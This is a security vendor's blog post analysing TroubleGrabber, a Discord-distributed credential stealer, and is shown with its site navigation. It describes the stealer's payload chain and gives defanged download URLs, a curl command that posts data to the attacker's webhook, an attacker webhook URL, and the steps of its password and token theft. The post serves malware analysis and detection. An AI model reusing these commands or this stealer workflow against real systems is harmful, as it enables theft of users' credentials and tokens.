Netskope debuts as a Leader in the 2024 Gartner® Magic Quadrant™️ for Single-Vendor Secure Access Service Edge Get the report

close
close
  • Why Netskope chevron

    Changing the way networking and security work together.

  • Our Customers chevron

    Netskope serves more than 3,400 customers worldwide including more than 30 of the Fortune 100

  • Our Partners chevron

    We partner with security leaders to help you secure your journey to the cloud.

A Leader in SSE.
Now a Leader in Single-Vendor SASE.

Learn why Netskope debuted as a leader in the 2024 Gartner® Magic Quadrant™️ for Single-Vendor Secure Access Service Edge

Get the report
Customer Visionary Spotlights

Read how innovative customers are successfully navigating today’s changing networking & security landscape through the Netskope One platform.

Get the eBook
Customer Visionary Spotlights
Netskope’s partner-centric go-to-market strategy enables our partners to maximize their growth and profitability while transforming enterprise security.

Learn about Netskope Partners
Group of diverse young professionals smiling
Your Network of Tomorrow

Plan your path toward a faster, more secure, and more resilient network designed for the applications and users that you support.

Get the white paper
Your Network of Tomorrow
Introducing the Netskope One Platform

Netskope One is a cloud-native platform that offers converged security and networking services to enable your SASE and zero trust transformation.

Learn about Netskope One
Abstract with blue lighting
Embrace a Secure Access Service Edge (SASE) architecture

Netskope NewEdge is the world’s largest, highest-performing security private cloud and provides customers with unparalleled service coverage, performance and resilience.

Learn about NewEdge
NewEdge
Netskope Cloud Exchange

The Netskope Cloud Exchange (CE) provides customers with powerful integration tools to leverage investments across their security posture.

Learn about Cloud Exchange
Netskope video
The platform of the future is Netskope

Intelligent Security Service Edge (SSE), Cloud Access Security Broker (CASB), Cloud Firewall, Next Generation Secure Web Gateway (SWG), and Private Access for ZTNA built natively into a single solution to help every business on its journey to Secure Access Service Edge (SASE) architecture.

Go to Products Overview
Netskope video
Next Gen SASE Branch is hybrid — connected, secured, and automated

Netskope Next Gen SASE Branch converges Context-Aware SASE Fabric, Zero-Trust Hybrid Security, and SkopeAI-powered Cloud Orchestrator into a unified cloud offering, ushering in a fully modernized branch experience for the borderless enterprise.

Learn about Next Gen SASE Branch
People at the open space office
Designing a SASE Architecture For Dummies

Get your complimentary copy of the only guide to SASE design you’ll ever need.

Get the eBook
Make the move to market-leading cloud security services with minimal latency and high reliability.

Learn about NewEdge
Lighted highway through mountainside switchbacks
Safely enable the use of generative AI applications with application access control, real-time user coaching, and best-in-class data protection.

Learn how we secure generative AI use
Safely Enable ChatGPT and Generative AI
Zero trust solutions for SSE and SASE deployments

Learn about Zero Trust
Boat driving through open sea
Netskope achieves FedRAMP High Authorization

Choose Netskope GovCloud to accelerate your agency’s transformation.

Learn about Netskope GovCloud
Netskope GovCloud
  • Resources chevron

    Learn more about how Netskope can help you secure your journey to the cloud.

  • Blog chevron

    Learn how Netskope enables security and networking transformation through security service edge (SSE)

  • Events and Workshops chevron

    Stay ahead of the latest security trends and connect with your peers.

  • Security Defined chevron

    Everything you need to know in our cybersecurity encyclopedia.

Security Visionaries Podcast

The Convergence of CIO & CISO Roles
Join host Max Havey on the latest episode of Security Visionaries as he sits down with guest Jadee Hanson, CISO at Vanta.

Play the podcast
The Convergence of CIO & CISO Roles
Latest Blogs

Read how Netskope can enable the Zero Trust and SASE journey through security service edge (SSE) capabilities.

Read the blog
Sunrise and cloudy sky
SASE Week 2023: Your SASE journey starts now!

Replay sessions from the fourth annual SASE Week.

Explore sessions
SASE Week 2023
What is SASE?

Learn about the future convergence of networking and security tools in today’s cloud dominant business model.

Learn about SASE
  • Company chevron

    We help you stay ahead of cloud, data, and network security challenges.

  • Leadership chevron

    Our leadership team is fiercely committed to doing everything it takes to make our customers successful.

  • Customer Solutions chevron

    We are here for you and with you every step of the way, ensuring your success with Netskope.

  • Training and Certification chevron

    Netskope training will help you become a cloud security expert.

Supporting sustainability through data security

Netskope is proud to participate in Vision 2045: an initiative aimed to raise awareness on private industry’s role in sustainability.

Find out more
Supporting Sustainability Through Data Security
Thinkers, builders, dreamers, innovators. Together, we deliver cutting-edge cloud security solutions to help our customers protect their data and people.

Meet our team
Group of hikers scaling a snowy mountain
Netskope’s talented and experienced Professional Services team provides a prescriptive approach to your successful implementation.

Learn about Professional Services
Netskope Professional Services
Secure your digital transformation journey and make the most of your cloud, web, and private applications with Netskope training.

Learn about Training and Certifications
Group of young professionals working

Here Comes TroubleGrabber: Stealing Credentials Through Discord

Nov 13 2020

“TroubleGrabber” is a new credential stealer that is being spread through Discord attachments and uses Discord messages to communicate stolen credentials back to the attacker. While it bears some functional similarity to AnarchyGrabber, it is implemented differently and does not appear to be linked to the same group. TroubleGrabber is written by an individual named “Itroublve” and is currently used by multiple threat actors to target victims on Discord.

This malware, which primarily arrives via drive-by download, steals the web browser tokens, Discord webhook tokens, web browser passwords, and system information. This information is sent via webhook as a chat message to the attacker’s Discord server. Based on the file names and delivery mechanisms, TroubleGrabber is actively being used to target gamers.

We discovered TroubleGrabber in October 2020 when researching public Discord attachments for our previous blog post, Leaky Chats: Accidental Exposure and Malware in Discord Attachments.

This post will detail the technical analysis of TroubleGrabber and provide insights on the generator and its creator.

Discovery

In October 2020 alone, we identified more than 5,700 public Discord attachment URLs hosting malicious content, mostly in the form of Windows executable files and archives. At the same time, we scanned our malware database for samples containing Discord URLs used as next stage payloads or C2’s.

Figure 1 shows a breakdown of the top five detections of 1,650 malware samples from the same time period that were delivered from Discord and also contained Discord URLs.

Pie chart showing the top five detections of malware samples delivered from Discord and contained Discord URLs.
Figure 1: Top five detections

These detections are related to two distinct groups of malware 

  1. GameHack – Gen:Variant.Mikey.115607, Trojan.GenericKD.43979330 were patched or cracked versions of popular games. All the files associated with these detections were delivered via Discord.
  2. TroubleGrabber – Gen:Variant.Razy.742965 and Gen:Variant.Razy.728469 were the first stage payload of Gen:Variant.Razy.729793, a new malware variant we had not seen before October 2020. The files associated with these detections used Discord for malware delivery, next stage payloads, and C2 communication.

Attack depiction

The visual depiction of the TroubleGrabber attack kill chain is shown in Figure 2.

Graphic detailing the TroubleGrabber attack kill chain
Figure 2: TroubleGrabber attack kill chain

The depiction in Figure 2 illustrates the following steps

  • The delivery of TroubleGrabber to the victim’s machine via Discord attachment link.
  • TruoubleGrabber using Discord and Github for downloading the next stage payloads to the victim’s machine. 
  • The payloads steal victims credentials like system information, IP address, web browser passwords, and tokens. It then sends them as a chat message back to the attacker via a webhook URL.

TroubleGrabber analysis

The sample we are using for this analysis was hosted in the Discord URL –  https://cdn[.]discordapp[.]com/attachments/770854312020410388/770854941614014504/Discord_Nitro_Generator_and_Checker.rar (md5 – 172c6141eaa2a9b09827d149cb3b05ca). The downloaded archive “Discord_Nitro_Generator_and_Checker.rar” masqueraded as a Discord Nitro Generator application. The archive contained an executable file named “Discord Nitro Generator and Checker.exe”. An excerpt from the decompiled code is shown in Figure 3.

Screenshot showing decompiled code of Discord Nitro Generator and Checker.exe
Figure 3: Decompiled code of Discord Nitro Generator and Checker.exe

Figure 3 illustrates that the executable downloads the next stage payloads to “C:/temp” from the seven URLs hosted in Discord and Github as listed below

https://cdn[.]discordapp[.]com/attachments/773838254905622541/773838310610829312/Token_Stealer[.]bat
https://raw[.]githubusercontent[.]com/Itroublve/Token-Browser-Password-Stealer-Creator/master/AVOID%20ME/tokenstealer[.]vbs
https://raw[.]githubusercontent[.]com/Itroublve/Token-Browser-Password-Stealer-Creator/master/AVOID%20ME/tokenstealer2[.]vbs
https://github[.]com/Itroublve/Token-Browser-Password-Stealer-Creator/blob/master/AVOID%20ME/WebBrowserPassView[.]exe?raw=true
https://raw[.]githubusercontent[.]com/Itroublve/Token-Browser-Password-Stealer-Creator/master/AVOID%20ME/curl-ca-bundle[.]crt
https://github[.]com/Itroublve/Token-Browser-Password-Stealer-Creator/blob/master/AVOID%20ME/curl[.]exe?raw=true
https://cdn[.]discordapp[.]com/attachments/773838254905622541/773838305497186304/sendhookfile[.]exe

The functionality of curl.exe, Curl-ca-bundle.crt, WebBrowserPassView.exe, tokenstealer.vbs, Tokenstealer2.vbs,Tokenstealer.bat, and sendhookfile.exe is as follows:

Curl.exe

Curl.exe is a command-line tool that is used for uploading, downloading, and posting data over multiple supported protocols. The malware uses a curl command for posting status message of the victim’s details via webhook as follows:

C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**INJECTION STARTED!**\"}" Webhook  

Curl-ca-bundle.crt

Curl-ca-bundle.crt is the certificate used by curl to validate with the remote server. Curl performs SSL certificate verification by using the public certificate authorities present in the file curl-ca-bundle.crt for uploading, downloading, and posting data.

WebBrowserPassView.exe

WebBrowserPassView.exe is a password recovery utility from Nirsoft that reveals the passwords saved in web browsers. This utility has a history of being used by threat actors to steal the stored passwords and send them back to their C2. TroubleGrabber uses WebBrowserPassView.exe to do the same.

Tokenstealer.vbs

Tokenstealer.vbs is a Visual Basic script that extracts information from the infected host, including the product name, product ID, and product key, and saves it in the location “C:\temp\WindowsInfo.txt”.

Tokenstealer2.vbs

Tokenstealer2.vbs is a Visual Basic script that executes the file present in the location “C:\temp\finalres.bat”. Finalres.bat is the renamed file of tokenstealer.bat.

Tokenstealer.bat

Tokenstealer.bat is a batch file that performs the following actions

  • Uses https://myexternalip.com/raw to query the external IP address of the victim and saves it to the location “C:\temp\ip_address.txt”
  • Uses WebBrowserPassView.exe with the switch ‘stext’ to reveal the passwords saved in all of the victim’s web browsers and saves them to the location “C:/temp/Passwords.txt”
  • Uses Windows system info with the switch ‘findstr’ and wmic commands to find the “Domain,” “OS Name,” “OS Version,” “System Manufacturer,” “System Model,” “System type,” “Total Physical Memory,” “Disk drive,” “Hard Drive Space,” “Serial number,” and “cpuname”’ and saves it to the location “C:\temp\System_INFO.txt”
  • Performs curl posts of username, time and date, IP address, SystemInfo, and Discord, PTB, and Canary tokens via webhooks to the attacker’s Discord server
  • Executes filed.exe and customeExe.exe using the switch –processStart from the location “C:\temp\”
  • Kills Discord.exe, DiscordCanary.exe, and DiscordPTB.exe forcefully by using taskkill with the switch “/f /im” and restarts them
  • Deletes the files ip_address.txt, WindowsInfo.txt, Passwords.txt, curl-ca-bundle.crt, curl.exe, and CustomEXE.exe using del command with the switch “/f /q”
  • Shuts down and restarts the machine in 30 seconds using the shutdown command

Sendhookfile.exe

Sendhookfile.exe is an executable file that steals the tokens from web browsers and native Discord apps and posts them to the Discord webhook URL, “https://discord[.]com/api/webhooks/770853687592878092/Tt_nUInR-OAYwvSoRbXXJfArRFgMMFTweKLmgJDnS-YyAahH7gKiRCmwE_aG1gIbL0mX” as shown in Figure 4.

Screenshhot showing decompiled code of sendhookfile.exe
Figure 4: Decompiled code of sendhookfile.exe

Execution issues

During our analysis, the executable crashed in our sandbox environment as shown in Figure 5.

Screenshot showing Discord Nitro Generator and Checker.exe crash
Figure 5: Discord Nitro Generator and Checker.exe crash

This same crash message was seen for several other binaries that we executed in our analysis test environments. The executables crashed because the binaries were compiled without the support of TLS 1.2, which is not supported by default in the .NET 4.5 framework installed in our analysis machines. This is supported by default in .NET 4.6 and above.

On execution, the malware downloaded the binaries to the location “C:\temp” as shown in Figure 6.

Screenshot showing next stage payloads downloaded to the location “C:\temp”
Figure 6: Next stage payloads downloaded to the location “C:\temp”

The malware further sent all the victim’s credentials via webhooks as chat messages as shown in Figure 7.

Screenshot showing credentials sent as chat messages via webhooks
Figure 7: Credentials sent as chat messages via webhooks

Github account – Itroublve

“Discord Nitro Generator and Checker.exe” downloaded five next stage payloads from the Github user Itroublve in the repository “https://github[.]com/Itroublve/Token-Browser-Password-Stealer-Creator” as shown in Figure 8.

Screenshot showing Github repository of Token-Browser-Password-Stealer-Creator
Figure 8: Github repository of Token-Browser-Password-Stealer-Creator

We downloaded the latest release “ItroublveTSC V5.1” from the location “https://github.com/Itroublve/Token-Browser-Password-Stealer-Creator/releases/tag/5.1”. The package contained the generator of the malware and its components.

ItroublveTSC_V5.1

The package contained an executable named “ItroublveTSC.exe” that is used to generate the malware and its components as shown in Figure 9.